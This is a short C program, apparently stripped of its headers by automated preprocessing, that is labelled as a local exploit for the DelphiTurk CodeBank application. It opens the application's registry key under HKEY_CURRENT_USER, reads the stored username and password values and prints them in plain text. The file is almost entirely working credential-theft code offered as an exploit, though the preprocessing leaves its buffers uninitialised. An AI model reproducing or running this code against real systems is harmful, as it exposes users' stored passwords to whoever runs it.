
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int LPBYTE ;


 scalar_t__ BUFSIZE ;
 scalar_t__ ERROR_SUCCESS ;
 int HKEY_CURRENT_USER ;
 int KEY_QUERY_VALUE ;
 int RegCloseKey (int ) ;
 scalar_t__ RegOpenKeyEx (int ,char*,int ,int ,int *) ;
 scalar_t__ RegQueryValueEx (int ,char*,int *,int *,int ,scalar_t__*) ;
 scalar_t__ dwBufLen ;
 int hKey ;
 scalar_t__ lRet ;
 char* password ;
 int printf (char*,...) ;
 char* username ;

int main(void)
{

  if(RegOpenKeyEx(HKEY_CURRENT_USER,
     "Software\\DelphiTurk\\Codebank",
     0,
     KEY_QUERY_VALUE,
     &hKey) == ERROR_SUCCESS)
  {

            lRet = RegQueryValueEx( hKey, "username", ((void*)0), ((void*)0),
               (LPBYTE) username, &dwBufLen);

   if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
     RegCloseKey(hKey);
     printf("En error occured!");
     return 0;
   }


   lRet = RegQueryValueEx( hKey, "password", ((void*)0), ((void*)0),
               (LPBYTE) password, &dwBufLen);

   if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
     RegCloseKey(hKey);
     printf("En error occured!");
     return 0;
   }
            RegCloseKey( hKey );
   printf("DelphiTurk CodeBank Local Exploit by Kozan\n\n");
   printf("Username: %s\n",username);
   printf("Password: %s\n",password);


  }
  else{
   printf("DelphiTurk Codebank is not installed on your system!");
  }


 return 0;
}
